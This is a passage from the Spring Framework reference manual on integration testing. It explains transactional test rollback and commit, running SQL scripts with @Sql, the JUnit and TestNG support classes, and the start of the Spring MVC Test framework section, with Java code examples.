automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia the `@Commit` and `@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nSince Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured not to roll back the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in your test class with one of these annotations, and the\n`TransactionalTestExecutionListener` ensures that your __before transaction method__ or\n__after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit's `@Before`) and any __after\nmethods__ (such as methods annotated with JUnit's `@After`) are executed __within__ a\ntransaction. In addition, methods annotated with `@BeforeTransaction` or\n`@AfterTransaction` are naturally not executed for test methods that are not configured\nto run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit-based example displays a fictitious integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of the Hibernate or JPA session,\nmake sure to __flush__ the underlying session within test methods that execute that code.\nFailing to flush the underlying session can produce __false positives__: your test may\npass, but the same code throws an exception in a live, production environment. In the\nfollowing Hibernate-based example test case, one method demonstrates a false positive,\nand the other method correctly exposes the results of flushing the session. Note that\nthis applies to any ORM frameworks that maintain an in-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate SessionFactory sessionFactory;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate EntityManager entityManager;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<jdbc-embedded-database-support>> and <<jdbc-embedded-database-dao-testing>> for\ndetails.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. `ResourceDatabasePopulator` provides options for configuring the\ncharacter encoding, statement separator, comment delimiters, and error handling flags\nused when parsing and executing the scripts, and each of the configuration options has\na reasonable default value. Consult the javadocs for details on default values. To\nexecute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either\nthe `populate(Connection)` method to execute the populator against a\n`java.sql.Connection` or the `execute(DataSource)` method to execute the populator\nagainst a `javax.sql.DataSource`. The following example specifies SQL scripts for a test\nschema and test data, sets the statement separator to `\"@@\"`, and then executes the\nscripts against a `DataSource`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\tpublic void databaseTest {\n\t\tResourceDatabasePopulator populator = new ResourceDatabasePopulator();\n\t\tpopulator.addScripts(\n\t\t\tnew ClassPathResource(\"test-schema.sql\"), \n\t\t\tnew ClassPathResource(\"test-data.sql\"));\n\t\tpopulator.setSeparator(\"@@\");\n\t\tpopulator.execute(this.dataSource);\n\t\t\/\/ execute code that uses the test schema and data\n\t}\n----\n\nNote that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing\nand executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in\n<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\ninternally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs\nfor the various `executeSqlScript(..)` methods for further details.\n\n\n[[testcontext-executing-sql-declaratively]]\n===== Executing SQL scripts declaratively with `@Sql`\n\nIn addition to the aforementioned mechanisms for executing SQL scripts\n_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring\nTestContext Framework. Specifically, the `@Sql` annotation can be declared on a test\nclass or test method to configure the resource paths to SQL scripts that should be\nexecuted against a given database either before or after an integration test method. Note\nthat method-level declarations override class-level declarations and that support for\n`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.\n\n*Path resource semantics*\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"schema.sql\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/schema.sql\"`. A path\nwhich references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)\nwill be loaded using the specified resource protocol.\n\nThe following example demonstrates how to use `@Sql` at the class level and at the method\nlevel within a JUnit-based integration test class.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@Sql(\"\/test-schema.sql\")\n\tpublic class DatabaseTests {\n\n\t\t@Test\n\t\tpublic void emptySchemaTest {\n\t\t\t\/\/ execute code that uses the test schema without any test data\n\t\t}\n\n\t\t@Test\n\t\t@Sql({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\t\tpublic void userTest {\n\t\t\t\/\/ execute code that uses the test schema and test data\n\t\t}\n\t}\n----\n\n*Default script detection*\n\nIf no SQL scripts are specified, an attempt will be made to detect a `default` script\ndepending on where `@Sql` is declared. If a default cannot be detected, an\n`IllegalStateException` will be thrown.\n\n* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the\n\tcorresponding default script is `\"classpath:com\/example\/MyTest.sql\"`.\n* __method-level declaration__: if the annotated test method is named `testMethod()` and is\n\tdefined in the class `com.example.MyTest`, the corresponding default script is\n\t`\"classpath:com\/example\/MyTest.testMethod.sql\"`.\n\n*Declaring multiple `@Sql` sets*\n\nIf multiple sets of SQL scripts need to be configured for a given test class or test\nmethod but with different syntax configuration, different error handling rules, or\ndifferent execution phases per set, it is possible to declare multiple instances of\n`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the\n`@SqlGroup` annotation can be used as an explicit container for declaring multiple\ninstances of `@Sql`.\n\nThe following example demonstrates the use of `@Sql` as a repeatable annotation using\nJava 8. In this scenario the `test-schema.sql` script uses a different syntax for\nsingle-line comments.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\"))\n\t@Sql(\"\/test-user-data.sql\")\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\nThe following example is identical to the above except that the `@Sql` declarations are\ngrouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@SqlGroup({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n*Script execution phases*\n\nBy default, SQL scripts will be executed _before_ the corresponding test method. However,\nif a particular set of scripts needs to be executed _after_ the test method -- for\nexample, to clean up database state -- the `executionPhase` attribute in `@Sql` can be\nused as seen in the following example. Note that `ISOLATED` and `AFTER_TEST_METHOD` are\nstatically imported from `Sql.TransactionMode` and `Sql.ExecutionPhase` respectively.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"create-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED)\n\t)\n\t@Sql(\n\t\tscripts = \"delete-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED),\n\t\texecutionPhase = AFTER_TEST_METHOD\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that needs the test data to be committed\n\t\t\/\/ to the database outside of the test's transaction\n\t}\n----\n\n*Script configuration with `@SqlConfig`*\n\nConfiguration for script parsing and error handling can be configured via the\n`@SqlConfig` annotation. When declared as a class-level annotation on an integration test\nclass, `@SqlConfig` serves as _global_ configuration for all SQL scripts within the test\nclass hierarchy. When declared directly via the `config` attribute of the `@Sql`\nannotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared\nwithin the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit\ndefault value which is documented in the javadocs of the corresponding attribute. Due to\nthe rules defined for annotation attributes in the Java Language Specification, it is\nunfortunately not possible to assign a value of `null` to an annotation attribute. Thus,\nin order to support overrides of inherited global configuration, `@SqlConfig` attributes\nhave an explicit default value of either `\"\"` for Strings or `DEFAULT` for Enums. This\napproach allows local declarations of `@SqlConfig` to selectively override individual\nattributes from global declarations of `@SqlConfig` by providing a value other than `\"\"`\nor `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`\nattributes do not supply an explicit value other than `\"\"` or `DEFAULT`. Explicit _local_\nconfiguration therefore overrides _global_ configuration.\n\nThe configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those\nsupported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those\nprovided by the `<jdbc:initialize-database\/>` XML namespace element. Consult the javadocs\nof individual attributes in `@Sql` and `@SqlConfig` for details.\n\n[[testcontext-executing-sql-declaratively-tx]]\n*Transaction management for `@Sql`*\n\nBy default, the `SqlScriptsTestExecutionListener` will infer the desired transaction\nsemantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed\nwithout a transaction, within an existing Spring-managed transaction -- for example, a\ntransaction managed by the `TransactionalTestExecutionListener` for a test annotated with\n`@Transactional` -- or within an isolated transaction, depending on the configured value\nof the `transactionMode` attribute in `@SqlConfig` and the presence of a\n`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum\nhowever, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.\n\nIf the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and\n`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,\nyou may specify explicit names via the `dataSource` and `transactionManager` attributes\nof `@SqlConfig`. Furthermore, the transaction propagation behavior can be controlled via\nthe `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be\nexecuted in an isolated transaction. Although a thorough discussion of all supported\noptions for transaction management with `@Sql` is beyond the scope of this reference\nmanual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide\ndetailed information, and the following example demonstrates a typical testing scenario\nusing JUnit and transactional tests with `@Sql`. Note that there is no need to clean up\nthe database after the `usersTest()` method is executed since any changes made to the\ndatabase (either within the the test method or within the `\/test-data.sql` script) will\nbe automatically rolled back by the `TransactionalTestExecutionListener` (see\n<<testcontext-tx,transaction management>> for details).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestDatabaseConfig.class)\n\t@Transactional\n\tpublic class TransactionalSqlScriptsTests {\n\n\t\tprotected JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\t@Sql(\"\/test-data.sql\")\n\t\tpublic void usersTest() {\n\t\t\t\/\/ verify state in test database:\n\t\t\tassertNumUsers(2);\n\t\t\t\/\/ execute code that uses the test data...\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n\n[[testcontext-support-classes]]\n==== TestContext Framework support classes\n\n\n[[testcontext-junit4-runner]]\n===== Spring JUnit Runner\n\nThe __Spring TestContext Framework__ offers full integration with JUnit 4 through a\ncustom runner (supported on JUnit 4.12 or higher). By annotating test classes with\n`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`\nvariant, developers can implement standard JUnit-based unit and integration tests and\nsimultaneously reap the benefits of the TestContext framework such as support for loading\napplication contexts, dependency injection of test instances, transactional test method\nexecution, and so on. If you would like to use the Spring TestContext Framework with an\nalternative runner such as JUnit's `Parameterized` or third-party runners such as the\n`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support\nfor JUnit rules>> instead.\n\nThe following code listing displays the minimal requirements for configuring a test class\nto run with the custom Spring `Runner`. `@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule SPRING_CLASS_RULE = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit-based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. Here is a\nJUnit-based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\n\timport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\n\timport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class ExampleTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t@Test\n\t\tpublic void getAccount() throws Exception {\n\t\t\tthis.mockMvc.perform(get(\"\/accounts\/1\").accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n\t\t\t\t.andExpect(status().isOk())\n\t\t\t\t.andExpect(content().contentType(\"application\/json\"))\n\t\t\t\t.andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n\t\t}\n\n\t}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. Just check the support for code\ncompletion on static members.\n\n[[spring-mvc-test-server-setup-options]]\n===== Setup Options\nThere are two main options for creating an instance of `MockMvc`.\nThe first is to load Spring MVC configuration through the __TestContext\nframework__, which loads the Spring configuration and injects a `WebApplicationContext`\ninto the test to use to build a `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"my-servlet-context.xml\")\n\tpublic class MyWebTests {\n\n\t\t@Autowired\n\t\tprivate 